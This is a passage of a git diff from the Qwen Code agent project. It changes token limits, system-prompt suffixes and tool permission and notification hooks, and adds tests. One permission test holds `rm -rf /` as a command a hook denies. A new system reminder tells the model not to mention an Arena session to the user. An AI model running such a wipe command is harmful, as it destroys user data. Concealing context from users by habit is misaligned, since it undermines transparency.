+343,11 @@ Your core function is efficient and safe assistance. Balance extreme conciseness const memorySuffix = userMemory && userMemory.trim().length > 0 - ? `\n\n---\n\n${userMemory.trim()}` + ? buildSystemPromptSuffix(userMemory) : ''; + const appendSuffix = buildSystemPromptSuffix(appendInstruction); - return `${basePrompt}${memorySuffix}`; + return `${basePrompt}${memorySuffix}${appendSuffix}`; } /** @@ -859,6 +865,16 @@ Plan mode is active. The user indicated that they do not want you to execute yet `; } +/** + * Generates a system reminder about an active Arena session. + * + * @param configFilePath - Absolute path to the arena session's `config.json` + * @returns A formatted system reminder string wrapped in XML tags + */ +export function getArenaSystemReminder(configFilePath: string): string { + return `An Arena session is active. For details, read: ${configFilePath}. This message is for internal use only. Do not mention this to user in your response.`; +} + // ============================================================================ // Insight Analysis Prompts // ============================================================================ diff --git a/packages/core/src/core/tokenLimits.test.ts b/packages/core/src/core/tokenLimits.test.ts index 1ba9d4fd1..4c79cfe71 100644 --- a/packages/core/src/core/tokenLimits.test.ts +++ b/packages/core/src/core/tokenLimits.test.ts @@ -192,8 +192,8 @@ describe('tokenLimit', () => { }); describe('MiniMax', () => { - it('should return 1M for MiniMax-M2.5 (latest)', () => { - expect(tokenLimit('MiniMax-M2.5')).toBe(1000000); + it('should return 196608 for MiniMax-M2.5 (latest)', () => { + expect(tokenLimit('MiniMax-M2.5')).toBe(196608); }); it('should return 200K for MiniMax fallback', () => { @@ -284,12 +284,14 @@ describe('tokenLimit with output type', () => { describe('other output limits', () => { it('should return correct output limits for DeepSeek', () => { expect(tokenLimit('deepseek-reasoner', 'output')).toBe(65536); + expect(tokenLimit('deepseek-r1', 'output')).toBe(65536); + expect(tokenLimit('deepseek-r1-0528', 'output')).toBe(65536); expect(tokenLimit('deepseek-chat', 'output')).toBe(8192); }); it('should return correct output limits for GLM', () => { - expect(tokenLimit('glm-5', 'output')).toBe(131072); - expect(tokenLimit('glm-4.7', 'output')).toBe(131072); + expect(tokenLimit('glm-5', 'output')).toBe(16384); + expect(tokenLimit('glm-4.7', 'output')).toBe(16384); }); it('should return correct output limits for MiniMax', () => { diff --git a/packages/core/src/core/tokenLimits.ts b/packages/core/src/core/tokenLimits.ts index df911a936..e890d0cab 100644 --- a/packages/core/src/core/tokenLimits.ts +++ b/packages/core/src/core/tokenLimits.ts @@ -9,7 +9,7 @@ type TokenCount = number; export type TokenLimitType = 'input' | 'output'; export const DEFAULT_TOKEN_LIMIT: TokenCount = 131_072; // 128K (power-of-two) -export const DEFAULT_OUTPUT_TOKEN_LIMIT: TokenCount = 8_192; // 8K tokens +export const DEFAULT_OUTPUT_TOKEN_LIMIT: TokenCount = 32_000; // 32K tokens /** * Accurate numeric limits: @@ -21,6 +21,7 @@ const LIMITS = { '32k': 32_768, '64k': 65_536, '128k': 131_072, + '192k': 196_608, // MiniMax-M2.5 context window '200k': 200_000, // vendor-declared decimal, used by OpenAI, Anthropic, etc. '256k': 262_144, '272k': 272_000, // vendor-declared decimal, GPT-5.x input (400K total - 128K output) @@ -128,7 +129,7 @@ const PATTERNS: Array<[RegExp, TokenCount]> = [ // ------------------- // MiniMax // ------------------- - [/^minimax-m2\.5/i, LIMITS['1m']], // MiniMax-M2.5: 1,000,000 + [/^minimax-m2\.5/i, LIMITS['192k']], // MiniMax-M2.5: 196,608 [/^minimax-/i, LIMITS['200k']], // MiniMax fallback: 200K // ------------------- @@ -166,14 +167,16 @@ const OUTPUT_PATTERNS: Array<[RegExp, TokenCount]> = [ [/^qwen3\.5/, LIMITS['64k']], [/^coder-model$/, LIMITS['64k']], [/^qwen3-max/, LIMITS['64k']], + [/^qwen/, LIMITS['8k']], // Qwen fallback (VL, turbo, plus, etc.): 8K // DeepSeek [/^deepseek-reasoner/, LIMITS['64k']], + [/^deepseek-r1/, LIMITS['64k']], [/^deepseek-chat/, LIMITS['8k']], // Zhipu GLM - [/^glm-5/, LIMITS['128k']], - [/^glm-4\.7/, LIMITS['128k']], + [/^glm-5/, LIMITS['16k']], + [/^glm-4\.7/, LIMITS['16k']], // MiniMax [/^minimax-m2\.5/i, LIMITS['64k']], @@ -182,6 +185,19 @@ const OUTPUT_PATTERNS: Array<[RegExp, TokenCount]> = [ [/^kimi-k2\.5/, LIMITS['32k']], ]; +/** + * Check if a model has an explicitly defined output token limit. + * This distinguishes between models with known limits in OUTPUT_PATTERNS + * and unknown models that would fallback to DEFAULT_OUTPUT_TOKEN_LIMIT. + * + * @param model - The model name to check + * @returns true if the model has an explicit output limit definition, false if it uses the default fallback + */ +export function hasExplicitOutputLimit(model: Model): boolean { + const norm = normalize(model); + return OUTPUT_PATTERNS.some(([regex]) => regex.test(norm)); +} + /** * Return the token limit for a model string based on the specified type. * diff --git a/packages/core/src/core/toolHookTriggers.test.ts b/packages/core/src/core/toolHookTriggers.test.ts new file mode 100644 index 000000000..1e93fceb4 --- /dev/null +++ b/packages/core/src/core/toolHookTriggers.test.ts @@ -0,0 +1,980 @@ +/** + * @license + * Copyright 2026 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi } from 'vitest'; +import { + generateToolUseId, + firePreToolUseHook, + firePostToolUseHook, + firePostToolUseFailureHook, + fireNotificationHook, + appendAdditionalContext, + firePermissionRequestHook, +} from './toolHookTriggers.js'; +import type { MessageBus } from '../confirmation-bus/message-bus.js'; +import { NotificationType } from '../hooks/types.js'; +import { MessageBusType } from '../confirmation-bus/types.js'; + +// Mock the MessageBus +const createMockMessageBus = () => + ({ + request: vi.fn(), + }) as unknown as MessageBus; + +describe('toolHookTriggers', () => { + describe('generateToolUseId', () => { + it('should generate unique IDs with the correct prefix', () => { + const id1 = generateToolUseId(); + const id2 = generateToolUseId(); + + expect(id1).toMatch(/^toolu_\d+_[a-z0-9]+$/); + expect(id2).toMatch(/^toolu_\d+_[a-z0-9]+$/); + expect(id1).not.toBe(id2); + }); + + it('should generate IDs with current timestamp', () => { + const mockTime = Date.now(); + vi.spyOn(global.Date, 'now').mockImplementation(() => mockTime); + + const id = generateToolUseId(); + + expect(id).toContain(`toolu_${mockTime}`); + }); + }); + + describe('firePreToolUseHook', () => { + it('should return shouldProceed: true when no messageBus is provided', async () => { + const result = await firePreToolUseHook( + undefined, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldProceed: true }); + }); + + it('should return shouldProceed: true when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldProceed: true }); + }); + + it('should return shouldProceed: true when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldProceed: true }); + }); + + it('should return shouldProceed: false with denied type when tool is denied', async () => { + const mockOutput = { + hookSpecificOutput: { + permissionDecision: 'deny', + permissionDecisionReason: 'Tool not allowed', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldProceed: false, + blockReason: 'Tool not allowed', + blockType: 'denied', + }); + }); + + it('should return shouldProceed: false with ask type when confirmation is required', async () => { + const mockOutput = { + hookSpecificOutput: { + permissionDecision: 'ask', + permissionDecisionReason: 'User confirmation required', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldProceed: false, + blockReason: 'User confirmation required', + blockType: 'ask', + }); + }); + + it('should return shouldProceed: false with stop type when execution should stop', async () => { + const mockOutput = { + continue: false, + reason: 'Execution stopped by policy', + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldProceed: false, + blockReason: 'Execution stopped by policy', + blockType: 'stop', + }); + }); + + it('should return shouldProceed: true with additional context when available', async () => { + const mockOutput = { + hookSpecificOutput: { + additionalContext: 'Additional context here', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldProceed: true, + additionalContext: 'Additional context here', + }); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await firePreToolUseHook( + mockMessageBus, + 'test-tool', + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldProceed: true }); + }); + }); + + describe('firePostToolUseHook', () => { + it('should return shouldStop: false when no messageBus is provided', async () => { + const result = await firePostToolUseHook( + undefined, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldStop: false }); + }); + + it('should return shouldStop: false when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldStop: false }); + }); + + it('should return shouldStop: false when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldStop: false }); + }); + + it('should return shouldStop: true with stop reason when execution should stop', async () => { + const mockOutput = { + continue: false, + reason: 'Execution stopped by policy', + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldStop: true, + stopReason: 'Execution stopped by policy', + }); + }); + + it('should return shouldStop: false with additional context when available', async () => { + const mockOutput = { + hookSpecificOutput: { + additionalContext: 'Additional context here', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ + shouldStop: false, + additionalContext: 'Additional context here', + }); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await firePostToolUseHook( + mockMessageBus, + 'test-tool', + {}, + {}, + 'test-id', + 'auto', + ); + + expect(result).toEqual({ shouldStop: false }); + }); + }); + + describe('firePostToolUseFailureHook', () => { + it('should return empty object when no messageBus is provided', async () => { + const result = await firePostToolUseFailureHook( + undefined, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({}); + }); + + it('should return empty object when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await firePostToolUseFailureHook( + mockMessageBus, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({}); + }); + + it('should return empty object when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await firePostToolUseFailureHook( + mockMessageBus, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({}); + }); + + it('should return additional context when available', async () => { + const mockOutput = { + hookSpecificOutput: { + additionalContext: 'Additional context about the failure', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePostToolUseFailureHook( + mockMessageBus, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({ + additionalContext: 'Additional context about the failure', + }); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await firePostToolUseFailureHook( + mockMessageBus, + 'test-id', + 'test-tool', + {}, + 'error message', + ); + + expect(result).toEqual({}); + }); + }); + + describe('appendAdditionalContext', () => { + it('should return original content when no additional context is provided', () => { + const result = appendAdditionalContext('original content', undefined); + expect(result).toBe('original content'); + }); + + it('should append context to string content', () => { + const result = appendAdditionalContext( + 'original content', + 'additional context', + ); + expect(result).toBe('original content\n\nadditional context'); + }); + + it('should append context as text part to PartListUnion array', () => { + const originalContent = [{ text: 'original' }]; + const result = appendAdditionalContext( + originalContent, + 'additional context', + ); + + expect(result).toEqual([ + { text: 'original' }, + { text: 'additional context' }, + ]); + }); + + it('should handle non-array PartListUnion content', () => { + const originalContent = { text: 'original' }; + const result = appendAdditionalContext( + originalContent, + 'additional context', + ); + + expect(result).toEqual({ text: 'original' }); + }); + + it('should return original array content when no additional context is provided', () => { + const originalContent = [{ text: 'original' }]; + const result = appendAdditionalContext(originalContent, undefined); + + expect(result).toEqual([{ text: 'original' }]); + }); + }); + + describe('fireNotificationHook', () => { + it('should return empty object when no messageBus is provided', async () => { + const result = await fireNotificationHook( + undefined, + 'Test notification', + NotificationType.PermissionPrompt, + 'Test Title', + ); + + expect(result).toEqual({}); + }); + + it('should return empty object when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await fireNotificationHook( + mockMessageBus, + 'Test notification', + NotificationType.PermissionPrompt, + ); + + expect(result).toEqual({}); + }); + + it('should return empty object when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await fireNotificationHook( + mockMessageBus, + 'Test notification', + NotificationType.IdlePrompt, + ); + + expect(result).toEqual({}); + }); + + it('should return additional context when available', async () => { + const mockOutput = { + hookSpecificOutput: { + additionalContext: 'Additional context from notification hook', + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await fireNotificationHook( + mockMessageBus, + 'Test notification', + NotificationType.AuthSuccess, + ); + + expect(result).toEqual({ + additionalContext: 'Additional context from notification hook', + }); + }); + + it('should send correct parameters to MessageBus for permission_prompt', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Qwen Code needs your permission to use Bash', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Qwen Code needs your permission to use Bash', + notification_type: 'permission_prompt', + title: 'Permission needed', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should send correct parameters to MessageBus for idle_prompt', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Qwen Code is waiting for your input', + notification_type: 'idle_prompt', + title: 'Waiting for input', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should send correct parameters to MessageBus for auth_success', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Authentication successful', + NotificationType.AuthSuccess, + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Authentication successful', + notification_type: 'auth_success', + title: undefined, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should send correct parameters to MessageBus for elicitation_dialog', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Dialog shown to user', + NotificationType.ElicitationDialog, + 'Dialog', + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Dialog shown to user', + notification_type: 'elicitation_dialog', + title: 'Dialog', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await fireNotificationHook( + mockMessageBus, + 'Test notification', + NotificationType.PermissionPrompt, + ); + + expect(result).toEqual({}); + }); + + it('should handle notification without title', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await fireNotificationHook( + mockMessageBus, + 'Test notification without title', + NotificationType.IdlePrompt, + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Test notification without title', + notification_type: 'idle_prompt', + title: undefined, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + }); + + describe('firePermissionRequestHook', () => { + it('should return hasDecision: false when no messageBus is provided', async () => { + const result = await firePermissionRequestHook( + undefined, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ hasDecision: false }); + }); + + it('should return hasDecision: false when hook execution fails', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: false, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ hasDecision: false }); + }); + + it('should return hasDecision: false when hook output is empty', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ hasDecision: false }); + }); + + it('should return hasDecision: true with allow decision when tool is allowed', async () => { + const mockOutput = { + hookSpecificOutput: { + decision: { + behavior: 'allow', + updatedInput: { command: 'ls -la' }, + message: 'Tool allowed by policy', + }, + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'run_shell_command', + { command: 'ls' }, + 'auto', + ); + + expect(result).toEqual({ + hasDecision: true, + shouldAllow: true, + updatedInput: { command: 'ls -la' }, + denyMessage: undefined, + shouldInterrupt: undefined, + }); + }); + + it('should return hasDecision: true with deny decision when tool is denied', async () => { + const mockOutput = { + hookSpecificOutput: { + decision: { + behavior: 'deny', + message: 'Tool denied by policy', + interrupt: true, + }, + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'run_shell_command', + { command: 'rm -rf /' }, + 'auto', + ); + + expect(result).toEqual({ + hasDecision: true, + shouldAllow: false, + denyMessage: 'Tool denied by policy', + shouldInterrupt: true, + }); + }); + + it('should send correct parameters to MessageBus', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await firePermissionRequestHook( + mockMessageBus, + 'run_shell_command', + { command: 'ls' }, + 'auto', + [ + { + type: 'always_allow', + tool: 'run_shell_command', + }, + ], + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PermissionRequest', + input: { + tool_name: 'run_shell_command', + tool_input: { command: 'ls' }, + permission_mode: 'auto', + permission_suggestions: [ + { + type: 'always_allow', + tool: 'run_shell_command', + }, + ], + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should handle missing updated_input in allow decision', async () => { + const mockOutput = { + hookSpecificOutput: { + decision: { + behavior: 'allow', + message: 'Tool allowed', + }, + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ + hasDecision: true, + shouldAllow: true, + denyMessage: undefined, + shouldInterrupt: undefined, + }); + }); + + it('should handle missing message in decision', async () => { + const mockOutput = { + hookSpecificOutput: { + decision: { + behavior: 'deny', + }, + }, + }; + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: mockOutput, + }); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ + hasDecision: true, + shouldAllow: false, + denyMessage: undefined, + shouldInterrupt: undefined, + }); + }); + + it('should handle hook execution errors gracefully', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockRejectedValue( + new Error('Network error'), + ); + + const result = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'auto', + ); + + expect(result).toEqual({ hasDecision: false }); + }); + + it('should handle permission_suggestions being undefined', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: {}, + }); + + await firePermissionRequestHook( + mockMessageBus, + 'run_shell_command', + { command: 'ls' }, + 'auto', + undefined, + ); + + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PermissionRequest', + input: { + tool_name: 'run_shell_command', + tool_input: { command: 'ls' }, + permission_mode: 'auto', + permission_suggestions: undefined, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should handle different permission modes', async () => { + const mockMessageBus = createMockMessageBus(); + (mockMessageBus.request as ReturnType).mockResolvedValue({ + success: true, + output: { hookSpecificOutput: { decision: { behavior: 'allow' } } }, + }); + + const result1 = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'plan', + ); + + expect(result1.hasDecision).toBe(true); + + const result2 = await firePermissionRequestHook( + mockMessageBus, + 'test-tool', + {}, + 'yolo', + ); + + expect(result2.hasDecision).toBe(true); + }); + }); +}); diff --git a/packages/core/src/core/toolHookTriggers.ts b/packages/core/src/core/toolHookTriggers.ts new file mode 100644 index 000000000..1d62477e0 --- /dev/null +++ b/packages/core/src/core/toolHookTriggers.ts @@ -0,0 +1,478 @@ +/** + * @license + * Copyright 2026 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { MessageBus } from '../confirmation-bus/message-bus.js'; +import { MessageBusType } from '../confirmation-bus/types.js'; +import type { + HookExecutionRequest, + HookExecutionResponse, +} from '../confirmation-bus/types.js'; +import { + createHookOutput, + type PreToolUseHookOutput, + type PostToolUseHookOutput, + type PostToolUseFailureHookOutput, + type NotificationType, + type PermissionRequestHookOutput, + type PermissionSuggestion, +} from '../hooks/types.js'; +import { createDebugLogger } from '../utils/debugLogger.js'; +import type { Part, PartListUnion } from '@google/genai'; + +const debugLogger = createDebugLogger('TOOL_HOOKS'); + +/** + * Generate a unique tool_use_id for tracking tool executions + */ +export function generateToolUseId(): string { + return `toolu_${Date.now()}_${Math.random().toString(36).substring(2, 11)}`; +} + +/** + * Result of PreToolUse hook execution + */ +export interface PreToolUseHookResult { + /** Whether the tool execution should proceed */ + shouldProceed: boolean; + /** If blocked, the reason for blocking */ + blockReason?: string; + /** If blocked, the error type */ + blockType?: 'denied' | 'ask' | 'stop'; + /** Additional context to add */ + additionalContext?: string; +} + +/** + * Result of PostToolUse hook execution + */ +export interface PostToolUseHookResult { + /** Whether execution should stop */ + shouldStop: boolean; + /** Stop reason if applicable */ + stopReason?: string; + /** Additional context to append to tool response */ + additionalContext?: string; +} + +/** + * Result of PostToolUseFailure hook execution + */ +export interface PostToolUseFailureHookResult { + /** Additional context about the failure */ + additionalContext?: string; +} + +/** + * Fire PreToolUse hook via MessageBus and process the result + * + * @param messageBus - The message bus instance + * @param toolName - Name of the tool being executed + * @param toolInput - Input parameters for the tool + * @param toolUseId - Unique identifier for this tool use + * @param permissionMode - Current permission mode + * @returns PreToolUseHookResult indicating whether to proceed and any modifications + */ +export async function firePreToolUseHook( + messageBus: MessageBus | undefined, + toolName: string, + toolInput: Record, + toolUseId: string, + permissionMode: string, +): Promise { + if (!messageBus) { + return { shouldProceed: true }; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PreToolUse', + input: { + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + tool_use_id: toolUseId, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return { shouldProceed: true }; + } + + const preToolOutput = createHookOutput( + 'PreToolUse', + response.output, + ) as PreToolUseHookOutput; + + // Check if execution was denied + if (preToolOutput.isDenied()) { + return { + shouldProceed: false, + blockReason: + preToolOutput.getPermissionDecisionReason() || + preToolOutput.getEffectiveReason(), + blockType: 'denied', + }; + } + + // Check if user confirmation is required + if (preToolOutput.isAsk()) { + return { + shouldProceed: false, + blockReason: + preToolOutput.getPermissionDecisionReason() || + 'User confirmation required', + blockType: 'ask', + }; + } + + // Check if execution should stop + if (preToolOutput.shouldStopExecution()) { + return { + shouldProceed: false, + blockReason: preToolOutput.getEffectiveReason(), + blockType: 'stop', + }; + } + + // Get additional context + const additionalContext = preToolOutput.getAdditionalContext(); + + return { + shouldProceed: true, + additionalContext, + }; + } catch (error) { + // Hook errors should not block tool execution + debugLogger.warn( + `PreToolUse hook error for ${toolName}: ${error instanceof Error ? error.message : String(error)}`, + ); + return { shouldProceed: true }; + } +} + +/** + * Fire PostToolUse hook via MessageBus and process the result + * + * @param messageBus - The message bus instance + * @param toolName - Name of the tool that was executed + * @param toolInput - Input parameters that were used + * @param toolResponse - Response from the tool execution + * @param toolUseId - Unique identifier for this tool use + * @param permissionMode - Current permission mode + * @returns PostToolUseHookResult with any additional context + */ +export async function firePostToolUseHook( + messageBus: MessageBus | undefined, + toolName: string, + toolInput: Record, + toolResponse: Record, + toolUseId: string, + permissionMode: string, +): Promise { + if (!messageBus) { + return { shouldStop: false }; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PostToolUse', + input: { + permission_mode: permissionMode, + tool_name: toolName, + tool_input: toolInput, + tool_response: toolResponse, + tool_use_id: toolUseId, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return { shouldStop: false }; + } + + const postToolOutput = createHookOutput( + 'PostToolUse', + response.output, + ) as PostToolUseHookOutput; + + // Check if execution should stop + if (postToolOutput.shouldStopExecution()) { + return { + shouldStop: true, + stopReason: postToolOutput.getEffectiveReason(), + }; + } + + // Get additional context + const additionalContext = postToolOutput.getAdditionalContext(); + + return { + shouldStop: false, + additionalContext, + }; + } catch (error) { + // Hook errors should not affect tool result + debugLogger.warn( + `PostToolUse hook error for ${toolName}: ${error instanceof Error ? error.message : String(error)}`, + ); + return { shouldStop: false }; + } +} + +/** + * Fire PostToolUseFailure hook via MessageBus and process the result + * + * @param messageBus - The message bus instance + * @param toolUseId - Unique identifier for this tool use + * @param toolName - Name of the tool that failed + * @param toolInput - Input parameters that were used + * @param errorMessage - Error message describing the failure + * @param errorType - Optional error type classification + * @param isInterrupt - Whether the failure was caused by user interruption + * @returns PostToolUseFailureHookResult with any additional context + */ +export async function firePostToolUseFailureHook( + messageBus: MessageBus | undefined, + toolUseId: string, + toolName: string, + toolInput: Record, + errorMessage: string, + isInterrupt?: boolean, + permissionMode?: string, +): Promise { + if (!messageBus) { + return {}; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PostToolUseFailure', + input: { + permission_mode: permissionMode, + tool_use_id: toolUseId, + tool_name: toolName, + tool_input: toolInput, + error: errorMessage, + is_interrupt: isInterrupt, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return {}; + } + + const failureOutput = createHookOutput( + 'PostToolUseFailure', + response.output, + ) as PostToolUseFailureHookOutput; + const additionalContext = failureOutput.getAdditionalContext(); + + return { 